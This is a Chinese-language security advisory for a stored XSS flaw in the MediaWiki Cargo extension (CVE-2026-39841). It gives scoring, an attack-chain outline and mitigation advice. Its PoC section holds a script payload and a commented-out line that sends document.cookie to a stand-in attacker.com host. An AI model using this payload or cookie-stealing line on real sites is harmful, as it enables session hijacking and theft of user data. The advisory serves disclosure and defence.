CVE-2026-39841 CVSS 6.1 中危

CVE-2026-39841: MediaWiki Cargo扩展存储型XSS漏洞

披露日期: 2026-04-07

来源: c4f26cc8-17ff-4c99-b5e2-38fc1793eacc

漏洞信息

漏洞编号

CVE-2026-39841

漏洞类型

存储型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wikimedia Foundation Mediawiki - Cargo Extension

漏洞概述

MediaWiki Cargo 扩展存在存储型跨站脚本（XSS）漏洞。由于未能正确中和脚本相关的 HTML 标签，攻击者可注入恶意脚本。该漏洞影响 3.8.7 之前的版本，成功利用可能导致用户数据泄露或会话被劫持。

技术细节

该漏洞发生在 MediaWiki 的 Cargo 扩展中，根本原因是缺乏对用户输入中脚本相关 HTML 标签的有效过滤。攻击者可以利用 Cargo 扩展的数据录入功能，提交包含恶意 JavaScript 代码的载荷。由于系统未进行适当的转义，此载荷被持久化存储在数据库中。当其他用户浏览包含该数据的页面时，恶意脚本会在其浏览器上下文中执行。根据 CVSS 3.1 评分，该漏洞通过网络发起攻击，无需用户认证，但需要用户交互（如访问页面）才能触发，主要影响机密性和完整性。

攻击链分析

STEP 1

侦察

攻击者识别目标是否使用了易受攻击版本的 MediaWiki Cargo Extension。

STEP 2

注入

攻击者在 Cargo 扩展的数据输入字段中插入恶意的 JavaScript 载荷。

STEP 3

存储

应用程序将未经过滤的恶意载荷存储在后端数据库中。

STEP 4

触发

受害者访问包含已存储恶意数据的页面，浏览器解析并执行脚本。

STEP 5

利用

恶意代码在受害者浏览器中运行，执行窃取 Cookie 或重定向等操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for MediaWiki Cargo Extension -->
<!-- Inject this payload into a vulnerable Cargo field -->
<script>
  // Demonstrate execution
  alert('CVE-2026-39841 Exploited');
  
  // Example: Steal session cookie
  // var img = new Image();
  // img.src = "http://attacker.com/steal?c=" + document.cookie;
</script>

影响范围

MediaWiki - Cargo Extension < 3.8.7

防御指南

临时缓解措施

在无法立即升级的情况下，建议限制对 Cargo 扩展功能的编辑权限，仅允许受信任的用户提交数据。同时，应检查现有的数据库记录中是否已包含潜在的恶意脚本，并进行清理。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表